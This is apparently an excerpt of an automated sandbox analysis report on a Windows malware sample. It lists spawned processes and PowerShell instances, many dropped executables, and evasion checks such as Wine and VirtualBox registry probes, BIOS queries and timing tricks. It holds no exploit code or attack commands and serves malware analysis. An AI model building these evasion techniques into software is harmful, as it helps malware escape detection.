                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_6-10154
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9741
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_5-12161
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04AC0C8E rdtsc 0_2_04AC0C8E
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 417Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1775Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 2006Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 725Jump to behavior
                        Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 8001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 1748Jump to behavior
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 7610
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 2005
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9870
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9897
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 5761
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 3586
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 8979
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 892
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 8310
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 1565
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA224.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA1.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\pywintypes310.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015359001\f11f18202b.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\psutil\_psutil_windows.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\win32trace.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_strxor.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exeJump to dropped file
